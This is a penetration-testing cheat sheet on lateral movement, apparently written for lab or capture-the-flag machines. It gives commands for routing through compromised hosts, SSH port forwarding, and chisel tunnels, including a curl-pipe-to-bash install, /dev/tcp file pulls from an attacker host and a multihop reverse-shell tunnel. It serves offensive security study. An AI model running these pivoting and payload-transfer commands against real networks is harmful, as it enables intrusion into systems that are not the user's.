Lateral Movement
Network Pivoting & Routing
sudo ip link set eth0 upCheck current routes before making changes. Identifies what networks are reachable and through which gateways:
ip route showRoute traffic to a target network through a compromised host:
sudo ip route add 192.168.2.0/24 via 192.168.1.254Remove a route when pivoting is complete or to change routing paths to avoid routing conflicts:
sudo ip route del 192.168.2.0/24Route all traffic through a specific gateway. Use when you need to tunnel all connections through a compromised host acting as your proxy:
sudo ip route add default via 192.168.1.1Use when you have multiple paths to the same network and need to control which route is preferred. Lower metrics = higher priority:
sudo ip route change 192.168.2.0/24 via 192.168.1.254 metric 200SSH Tunneling
Dynamic Port Forwarding
tail /etc/proxychains.confssh charix@10.10.10.84 -D 9050proxychains vncviewer 127.0.0.1:5901 -passwd secretLocal Port Forwarding
ssh -L PORT:localhost:PORT user@remotehost.comssh -L 8080:127.0.0.1:8080 -N -vv User@REemoteHostRemote Port Forwarding
ssh root@10.10.10.65 -R 4443:10.10.14.6:443chisel
curl https://i.jpillora.com/chisel! | bashTransfer chisel to a target
cp /usr/local/bin/chisel .nc -lvnp 80 < chiselNow on the remote host
cd /var/tmpcat < /dev/tcp/10.10.14.172/80 > chisel
bash -c "cat < /dev/tcp/172.19.0.4/7011 > chisel"chmod 755 /var/tmp/chiselCreate a tunnel
/usr/local/bin/chisel server -p 8002 -reverse -v/var/tmp/chisel client 10.10.14.172:8002 R:127.0.0.1:8001:172.19.0.2:80Multihop tunnel for reverse shell
First start the new server on your attacking host:
/usr/local/bin/chisel server -p 5000 -reverse -vSet also the listener:
nc -lvnp 9005Now set the first hop:
/var/tmp/chisel client 10.10.14.172:5000 6010:127.0.0.1:5000Finally set the second hop:
/var/tmp/chisel client 172.19.0.4:6010 7020:127.0.0.1:9005 &Last updated